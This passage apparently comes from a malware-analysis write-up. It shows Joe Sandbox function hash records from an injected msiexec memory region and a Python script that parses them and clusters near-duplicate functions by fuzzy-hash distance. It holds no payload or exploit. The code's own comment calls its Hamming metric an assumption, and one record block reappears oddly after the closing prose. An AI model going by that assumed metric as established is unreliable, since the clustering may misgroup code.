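• Instruction Fuzzy Hash: 34C1B174E00218CFDB14DFA9C954B9DBBB6FF89300F1085A9D808AB3A9DB355A85CF50
Memory Dump Source
• Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1dc22eb6bd3368d15f13432a250a7883395bca666672a2f4acb164a7910d6de6
• Instruction ID: b1d96074d3011039c88756ae016867b0981acd1bcb273d2e76f845e60e104d22
• Opcode Fuzzy Hash: 1dc22eb6bd3368d15f13432a250a7883395bca666672a2f4acb164a7910d6de6
• Instruction Fuzzy Hash: 3DC1B2B4E01218CFDB14DFA5C994B9DBBB6FF89300F1081A9D809AB399DB355A85CF10
Memory Dump Source
• Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6c2ca6cbe4e2129c54ee564587a33a85bba37d821e8feec548cfcd0b40f0fffc
• Instruction ID: 385874877d55559f716ded5e3b21e6fb103fac33c0504c58ef41dfd1a4a9c8bb
• Opcode Fuzzy Hash: 6c2ca6cbe4e2129c54ee564587a33a85bba37d821e8feec548cfcd0b40f0fffc
• Instruction Fuzzy Hash: 53C1A174E00218CFEB14DFA5C994B9DBBB6FF89300F1085A9D809AB369DB355A85CF50
Memory Dump Source
• Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3c19014ec179cf018dccd7da698fb2f11190f7963bb9a0f8dbd6338b968585b8
• Instruction ID: 210d94c6f84bcecd9d9caba09456c2c97a28c88f99b396c9b50be05f1ead6f03
• Opcode Fuzzy Hash: 3c19014ec179cf018dccd7da698fb2f11190f7963bb9a0f8dbd6338b968585b8
• Instruction Fuzzy Hash: 23A19D74A01228CFDB65DF24C954BDABBB2BF89300F5085EAD80DA7254DB359E81CF51
Strings
Memory Dump Source
• Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
Similarity
• API ID:
• String ID: \;jq$\;jq$\;jq$\;jq
• API String ID: 0-138087212
• Opcode ID: d25cd53425996dda275e99201ce5fbe0ac3dba0ee13f8d300b5c27fb56086a66
• Instruction ID: 272959f2b02f5b89bc7ed17e415e04a3791b107519349d8960a1166d536d5078
• Opcode Fuzzy Hash: d25cd53425996dda275e99201ce5fbe0ac3dba0ee13f8d300b5c27fb56086a66
• Instruction Fuzzy Hash: C7018B317402158FCB248E2DC540AA67BEBBF98760725457AE406CB3B4DE35FC418791
"""


@dataclass
class FunctionRecord:
    dump: str = ""            # .sdmp file the function was lifted from
    offset: str = ""          # base of the dumped region, as printed in the report
    based_on_pe: str = ""     # "false" means no PE header backs the region
    api_id: str = ""
    string_id: str = ""
    api_string_id: str = ""
    opcode_id: str = ""
    instruction_id: str = ""
    opcode_fuzzy: str = ""
    instruction_fuzzy: str = ""


FIELD_MAP = {
    "API ID": "api_id", "String ID": "string_id", "API String ID": "api_string_id",
    "Opcode ID": "opcode_id", "Instruction ID": "instruction_id",
    "Opcode Fuzzy Hash": "opcode_fuzzy", "Instruction Fuzzy Hash": "instruction_fuzzy",
}
SOURCE_RE = re.compile(r"^([^,]+), Offset: ([0-9A-Fa-f]+), based on PE: (\w+)$")


def parse_records(text):
    """Split report text into FunctionRecords; one record per 'Memory Dump Source'."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            current = FunctionRecord()
            records.append(current)
            continue
        if not line.startswith("•"):
            continue                       # headers: Joe Sandbox IDA Plugin, Similarity, Strings
        if current is None:                # bullet fields of a record whose header was cut off
            current = FunctionRecord()
            records.append(current)
        key, _, value = line[1:].partition(":")   # split on the first colon only
        key, value = key.strip(), value.strip()
        if key == "Source File":
            m = SOURCE_RE.match(value)
            if m:
                current.dump, current.offset, current.based_on_pe = m.groups()
            else:
                current.dump = value
        elif key in FIELD_MAP:
            setattr(current, FIELD_MAP[key], value)
    return records


def hamming(a, b):
    """Nibble-wise Hamming distance between two equal-length hex fuzzy hashes (assumed metric)."""
    if len(a) != len(b):
        raise ValueError("fuzzy hashes of different length are not comparable")
    return sum(x != y for x, y in zip(a, b))


def cluster_by_fuzzy_hash(records, max_distance=12):
    """Single-linkage clustering: records whose Instruction Fuzzy Hashes are within
    max_distance nibbles end up in one group.  Returns sorted lists of record indices."""
    parent = list(range(len(records)))

    def find(i):
        while parent[i] != i:
            parent[i] = parent[parent[i]]
            i = parent[i]
        return i

    for i, j in combinations(range(len(records)), 2):
        a, b = records[i].instruction_fuzzy, records[j].instruction_fuzzy
        if a and b and len(a) == len(b) and hamming(a, b) <= max_distance:
            parent[find(i)] = find(j)
    groups = {}
    for i in range(len(records)):
        groups.setdefault(find(i), []).append(i)
    return sorted(groups.values())


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for group in cluster_by_fuzzy_hash(recs):
        r = recs[group[0]]
        refs = "no API/string refs" if not (r.api_id or r.string_id) else f"string ref {r.string_id!r}"
        print(f"offset {r.offset}: {len(group)} function(s), {refs}, "
              f"hash prefix {r.instruction_fuzzy[:16]}")
```

Run against the full function listing of a report and the near-duplicate families stand out as one cluster per region, which is the question you actually want answered before opening each function in IDA: how many distinct pieces of code are in the injected region, rather than how many functions the plugin carved out of it.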
Strings
Memory Dump Source
• Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
Similarity
• API ID:
• String ID: \;jq$\;jq$\;jq$\;jq
• API String ID: 0-138087212
• Opcode ID: d25cd53425996dda275e99201ce5fbe0ac3dba0ee13f8d300b5c27fb56086a66
• Instruction ID: 272959f2b02f5b89bc7ed17e415e04a3791b107519349d8960a1166d536d5078
• Opcode Fuzzy Hash: d25cd53425996dda275e99201ce5fbe0ac3dba0ee13f8d300b5c27fb56086a66
• Instruction Fuzzy Hash: C7018B317402158FCB248E2DC540AA67BEBBF98760725457AE406CB3B4DE35FC418791